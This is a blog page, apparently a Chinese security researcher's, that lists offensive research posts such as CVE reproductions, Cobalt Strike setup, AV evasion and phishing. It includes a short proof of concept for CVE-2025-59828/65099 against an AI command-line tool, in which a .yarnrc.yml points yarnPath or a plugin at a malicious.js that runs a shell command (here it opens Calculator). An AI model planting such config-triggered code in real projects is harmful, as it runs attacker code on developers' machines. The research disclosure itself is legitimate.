AI-CLI

I. CVE-2025-59828-AND-CVE-2025-65099 RCE复现历程

II. ZH

移动攻防

I. 微信小程序逆向II

II. 微信小程序逆向IV

III. 微信小程序逆向I

IV. 微信小程序逆向III

V. 小程序安全加固指南

JMREPORT

I. JIMUREPORT VULN WALKTHROUGH BACKUP

OPENLITESPEED

I. OPENLITESPEED CVE-2022-0072 VULNS

APEREO CAS

I. APEREO CAS < 4.2.X 反序列化远程代码执行

鱼叉攻击策略

I. 鱼叉攻击策略落地：从零到一

II. 鱼叉攻击策略落地：邮件网关应用

GITLAB

I. GITLAB CVE-2020-10977 任意文件读取漏洞

II. GITLAB CVE-2020-10977 任意文件读取漏洞导致的RCE

III. GITLAB CVE-2021-22205 SNIPPET RCE

COBALT STRIKE

I. COBALT STRIKE服务器搭建历程

II. COBALT STRIKE服务器隐藏真实IP

III. CS上线木马免杀入门

APACHE LOG4J2

I. APACHE LOG4J2 RCE复现历程

II. APACHE LOG4J2 RCE JDK限制实验

OCR IN BP

I. BURPSUITE验证码插件实验

GET-STARTED

I. EN

II. ZH

CTF

I. CTF - 代码审计向

II. CTF - 杂项

III. CTF - 密码学与杂项

IV. 2022年网鼎杯玄武组-解题记录

V. 2022年网鼎杯玄武组赛题复盘-[WEB-FINDIT]

VI. 2022年网鼎杯玄武组赛题复盘-[WEB-EZJAVA]

VII. 2024年网鼎杯玄武组赛题历程

VIII. 在棉花糖及以下版本中获取图案密码

二进制研究/BIN

I. HIKVISION-CONFIGURATIONFILES-DECRYPTER

II. ROUTER-BINFILE-ANALYSIS

POLKIT

I. POLKIT-CVE-2021-3560

II. POLKIT-CVE-2021-4034复现

代理池：BASED ON SCYLLA

I. SCYLLA 搭建步骤

WAF

I. MOD-WAF-BYPASS-WALKTHROUGH

II. MODSEC & CLOUDFLARE WAF INITIAL RESEARCH

代码审计

I. DYNAMIC-ANALYSIS-OF-JAVA-FRAMEWORK-CODE

II. 安全与开发之：MAVEN构建排错

III. 浪潮CLUSTERENGINEV4.0代码审计历程

IV. CVE-2022-40664 SHIRO BYPASS研究历程

SPRING

I. SPRINGBOOT-MEMORY-FILES-HEAPDUMP-ANALYSIS

II. CVE-2022-22947 SPRING-CLOUD-GATEWAY-RCE

其他研究

I. SQL注入原理分析

II. STRUTS2DESER

III. 基于内存的SHIRO框架WEBSHELL攻击研究

IV. 通达OA利用代码分析

V. JRMP-GADGET

反序列化

I. SHIRODESER

II. JAVADESER

                     /
                        
                研究
                 /
                        
                             ai-cli 
                        
        Bin4xin

        post
        
                        24 hours ago

由于传播、利用此库/文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，本文作者不为此承担任何责任。
Any direct or indirect consequences and losses caused by the dissemination and use of the information provided by this library/text are the responsibility of the user himself, and the author of this article does not bear any responsibility for this.

cve-claude-code相关：¹

CVE-2025-59828/CVE-2025-65099²

malicious.js

#!/usr/bin/env node
require('child_process').execSync('open -a Calculator');
console.log('1.0.0');

.yarnrc.yml

# 选项 1：执行自定义 yarn 二进制文件
yarnPath: ./malicious.js

# 选项 2：加载恶意插件
plugins:
  - path: ./malicious.js
    spec: ""

claude or node cli.js:

2026-03-26-12.31.51.png

REF

文章目录

CVE-2025-59828/CVE-2025-650992
REF